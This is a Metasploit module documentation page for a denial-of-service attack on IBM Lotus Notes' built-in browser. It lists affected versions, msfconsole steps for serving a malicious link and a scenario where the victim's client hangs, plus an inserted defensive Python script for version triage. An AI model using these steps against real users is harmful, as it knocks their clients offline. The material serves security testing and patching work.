Path: blob/master/documentation/modules/auxiliary/dos/http/ibm_lotus_notes2.md
Vulnerable Application
This module exploits a vulnerability in the built-in web browser of the IBM Lotus Notes client application.
If a user is persuaded to click on a malicious link, it opens many file select dialog boxes, which causes the client to hang so that it has to be restarted.
Affected Products and Versions
IBM Notes 9.0.1 to 9.0.1 FP8 IF1
IBM Notes 9.0 to 9.0 IF4
IBM Notes 8.5.3 to 8.5.3 FP6 IF13
IBM Notes 8.5.2 to 8.5.2 FP4 IF3
IBM Notes 8.5.1 to 8.5.1 FP5 IF5
IBM Notes 8.5 release
Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999384
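For patch triage, the affected ranges above can be checked against a client inventory. The following is an added example, not part of the module or its documentation; the version-string format, the function names, the sample inventory and the reading of "8.5 release" as the base 8.5 build are assumptions.

```python
import re

# Highest affected (fix pack, interim fix) per release, transcribed from the
# list above. Assumptions: every build from the base release up to the listed
# FP/IF is affected, and "8.5 release" means base 8.5 with no fix pack.
AFFECTED_UP_TO = {
    (9, 0, 1): (8, 1),
    (9, 0, 0): (0, 4),
    (8, 5, 3): (6, 13),
    (8, 5, 2): (4, 3),
    (8, 5, 1): (5, 5),
    (8, 5, 0): (0, 0),
}

# Accepts strings such as "IBM Notes 9.0.1 FP8 IF1", "9.0 IF4" or "8.5.3FP6".
VERSION_RE = re.compile(
    r"^\s*(?:IBM\s+)?(?:Lotus\s+)?(?:Notes\s+)?"
    r"(\d+)\.(\d+)(?:\.(\d+))?"
    r"(?:\s*FP\s*(\d+))?(?:\s*IF\s*(\d+))?\s*$",
    re.IGNORECASE,
)

def parse_version(text):
    """Return ((major, minor, patch), (fix_pack, interim_fix))."""
    m = VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised Notes version string: {text!r}")
    major, minor, patch, fp, ifx = (int(g) if g else 0 for g in m.groups())
    return (major, minor, patch), (fp, ifx)

def classify(text):
    """Place one version string relative to the listed affected ranges."""
    release, level = parse_version(text)
    bound = AFFECTED_UP_TO.get(release)
    if bound is None:
        return "release not listed"   # outside the list: check the bulletin
    return "affected" if level <= bound else "above listed range"

def triage(inventory):
    """Hosts from a {host: version string} map that fall in an affected range."""
    return sorted(h for h, v in inventory.items() if classify(v) == "affected")

# Constructed sample inventory (hypothetical host names).
SAMPLE = {"ws-01": "IBM Notes 9.0.1 FP7 IF3", "ws-02": "9.0.1 FP9",
          "ws-03": "Notes 8.5.3 FP6 IF13", "ws-04": "9.0 IF5", "ws-05": "10.0.1"}

if __name__ == "__main__":
    print(triage(SAMPLE))
```

A "release not listed" result means only that the release does not appear in the list above, so such hosts still need a check against the IBM bulletin.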
Verification Steps
Start msfconsole
use auxiliary/dos/http/ibm_lotus_notes2.rb
Set SRVHOST
Set SRVPORT
run (Server started)
Visit server URL in the built-in web-browser of IBM Notes client application
Scenarios
At this point, the target should use the built-in web browser of their IBM Lotus Notes client to navigate to the above "Using URL" value. They should then see their Notes app become unresponsive.